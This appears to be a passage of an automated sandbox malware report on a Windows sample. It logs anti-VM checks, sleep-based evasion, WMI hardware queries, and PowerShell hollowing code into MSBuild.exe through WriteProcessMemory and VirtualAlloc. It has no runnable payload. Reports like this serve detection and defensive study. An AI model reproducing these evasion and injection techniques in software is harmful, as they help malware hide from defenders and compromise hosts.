                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 12E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2FB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2F00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 11D0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2D80000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2AF0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 7A0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2400000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: A20000 memory reserve | memory write watch
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1383Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2007Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3124Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6686Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3471Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 6339Jump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2345
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7988Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep count: 3124 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep count: 6686 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -39830s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -39705s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -39580s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -39455s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -39330s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -39205s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -39080s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -38955s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -38830s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -38705s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -38580s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -38455s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -38330s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -38205s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -38080s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -37955s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -37832s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -37705s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -37580s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -37455s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -37330s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -37209s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -37080s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -36955s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -36830s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -36705s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -36580s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -36445s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -36330s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -36205s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -36080s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -35955s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -35830s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -35715s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -35596s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -35471s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -35346s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -35221s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -35096s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -34971s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -34846s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -34726s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -34612s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -34487s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -34362s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -34237s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -34112s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -33987s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -33862s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -33737s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2536Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5868Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F7204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF761F7204C
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F764E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF761F764E4
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39830Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39705Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39580Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39455Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39330Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39205Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39080Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38955Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38830Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38705Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38580Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38455Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38330Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38205Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38080Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37955Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37832Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37705Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37580Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37455Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37330Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37209Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37080Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36955Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36830Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36705Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36580Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36445Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36330Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36205Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36080Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35955Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35830Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35715Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35596Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35471Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35346Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35221Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35096Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34971Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34846Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34726Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34612Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34487Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34362Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34237Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34112Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33987Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33862Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33737Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData\Roaming
                  Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                  Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user
                  Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                  Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData
                  Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                  Source: ModuleAnalysisCache.6.drBinary or memory string: Remove-NetEventVmNetworkAdapter
                  Source: wscript.exe, 00000003.00000003.1661779222.000002A83E968000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\/
                  Source: ModuleAnalysisCache.6.drBinary or memory string: Add-NetEventVmNetworkAdapter
                  Source: MSBuild.exe, 00000008.00000002.4140277158.00000000067C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL_
                  Source: ModuleAnalysisCache.6.drBinary or memory string: Get-NetEventVmNetworkAdapter
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F71D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF761F71D28
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F78494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF761F78494
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F78790 SetUnhandledExceptionFilter,0_2_00007FF761F78790
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Yara matchFile source: amsi64_8000.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7840, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR
                  Source: 6.2.powershell.exe.1d3bba895c8.2.raw.unpack, Options.csReference to suspicious API methods: VirtualAlloc(IntPtr.Zero, (uint)array.Length, 12288u, 64u)
                  Source: 6.2.powershell.exe.1d3bb47be40.1.raw.unpack, Progrgdfam3.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                  Source: 6.2.powershell.exe.1d3bb47be40.1.raw.unpack, Progrgdfam3.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                  Source: 6.2.powershell.exe.1d3bb47be40.1.raw.unpack, Progrgdfam3.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
                  Source: 6.2.powershell.exe.1d3bb47be40.1.raw.unpack, Progrgdfam3.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)
                  Source: windows media player.exe.8.dr, NativeMethodsShared.csReference to suspicious API methods: OpenProcess(eDesiredAccess.PROCESS_QUERY_INFORMATION, bInheritHandle: false, processIdTokill)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40E000Jump to behavior
